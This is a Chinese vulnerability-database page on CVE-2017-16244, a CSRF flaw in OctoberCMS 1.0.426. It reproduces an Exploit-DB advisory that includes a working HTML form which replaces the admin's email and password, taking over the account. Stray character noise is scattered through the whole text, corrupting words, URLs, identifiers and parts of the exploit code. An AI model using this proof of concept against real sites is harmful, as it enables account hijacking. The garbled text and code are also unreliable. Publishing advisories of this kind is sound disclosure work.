OctoberCMS 跨站请求伪造漏洞

漏洞ID 1124401 漏洞类型 跨站请求伪造
发布时间 2017-11-01 更新时间 2020-08-04
CVE编号 CVE-2017-16244

CNNVD-ID CNNVD6 z b 9-201711-N A ! s K010
q b ) =洞平台 PHP C ( u # VVSS评分 6.8
|漏洞来源
https://www.exploit-db.com/exploits/43106. O T 1 8 { H j
http://www.cnnvd.orgC & x b :.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-201! x `711-010
|漏洞详情
OctoberCMS是加拿大软件开发者Alex[ ] C sey Bobkov和澳大利亚软件开发者Samuel Georges共同研发的一套开源的、自托管的建立在Laravel PHP框架基础上的S ( j内容管理系统(CMS)。
OctoberCMS 1.0.426(又名Build 426)版本* ~ Z x O P =中存% f 6 ^ @跨站请求伪造漏洞,该漏洞源于程序在处理poP x o 3 }stback时没有正确的验证跨站请求伪造令牌。远程攻击者可借助certain _handler postback变量利用该漏I W ` u Y $ p q洞绕过保护机制,控制用户账户
|; 9 ` & } a `漏洞EXP
# Exploit Title: OctoberCMS 1.0.426 - CSRF to Admin Account Takover
# Vendor Homepage: https://octobercms.co% } / s G [m
# Software Link: https://octoberce 8 Lms.com/download
# Ex? c Z 3 0ploit Author: Zain SaO ! f w V zbahat
# Website: https://about.me/ZainSabahat` t n  D
# Category: webapps
# CVE: CVE-2017-16244
1. Description
Cross-Site Request Forgery exists in OctoberCMS 1.0.426 (aka Build 426) due to improper validation of] X } CSRF( } r * 5 o 2 w Tokens for postback handl* V U ` Ving, allowing an attacker to successfully take over the victim's acD * M o : r _ - }count.
T@ . 3 U G j = Whe vendor was using additional X-CSRF Headers and CSRF Token to prevent the CSRF from occurring.The researcher found a way to bypass this pe z ( # V Yrotection.After digging morO 7 @ b 2 m 4 f 8e in t3 5 5 ; ~ X 9 che Application hex L _ = @ P r found a postback vn P g ` m W m Iariable "_handI ^ F x uler=" which could be used to perform CSRF without X-Headers.The CSRFN v a 1 D 5 Tokens were also not being validatee s Y ^ ^d when _handler parameter was used to make the r| Y 0 t = yequest.
In shorM f st, this attack byK ` G  J Qpasses a protection mechanism involving X-CSRF he, $ vaders and CSRF tokens via a certain _handler postba. f 2 * : v = $ ?ck variable.
ht! 8 j x :tps://c6 q Eve.mitre.org/cgi-bin/cvename.cgi?name=7 V , F pCVE-2017-16244
https://vB & xuld= ) )b.com/?id.108857
2. Proof of Concept
Below is the CSRF Exploio ^ % 0 e b { 0t (.html) which can lead to the takeover of the Admin's Account upon successful execution.
<html>
<body>
<form aU / g ; M c m 3ction="http://host/backend/users/myaccount" method="POST">
<input type="hm [ oidden" name="_handler" value="onSave" />
<7 +  U = 3 1input typeB A A Q Z 7 n="hiddX U Uen" name="User[login]" value="Admin" />
<input type="hiddenj . L ( l H @ $ ." name="User[email]" value="Hacked@hacked.com" />
<input type="hidden" name="User[first_name]" value="Admin" />
<input type="hidden" name="Usx 8 a d t H ` Ter[l0 d l I # g Gast_name]" value="1337" />
<input type="hidden" name="UsG 8 1 _ mer[passwoB s 9 A : R er_ 5 = . O l j Md]" value="YourNewPassword"B $ [ />
<input type="hidden" name="User[password_confirmation]" value="YourNewPassword" />
<input type="hidden" name="redirectJ % z" value=S , 0 g ^ P : x"0" />
<input type=2 Y ) c j B 5 }"submit" value="Submit request" />
</form>
</body>
</html>
Upon execution of this CSRF, the Admin Account detail@ & @ } ~ ] Z E ps will5 k B s 3 2 I B be replaced by ours leading to complete hijacking of Admin Account.{ l P X f 8 n *
3. Reference
https://github.com/octobercms/october/commit/4a6e0e1e0e2c3facebc17e0dbL , 338cC ) ; f A I N * -5b4d4cb05bd0
https:R % J ( 7 H | |//vuldb.com/?id.108857
4. Solution
TheZ R 3 v J ) = vulne| o ] n N 4rability will be patched by the vendor in the next release of OctoberCMS.FS 8 u ? 8ollowing cV z q 2 @  2 dhanges should be made fx h yor a temporary fix (https://git} I R Bhub.com/octobercms/oct^  P a  #ober/commit/4a6e0e1e0e2c3facebc17e0db38c5b4d4cb05bd0).
|参考资料

来源:CONFIRM
链接:https://githuK H Gb.com/octobercms/october/commit/4a6e0e1e0e2c3facebc17e0db38c5b4d4cb05bd0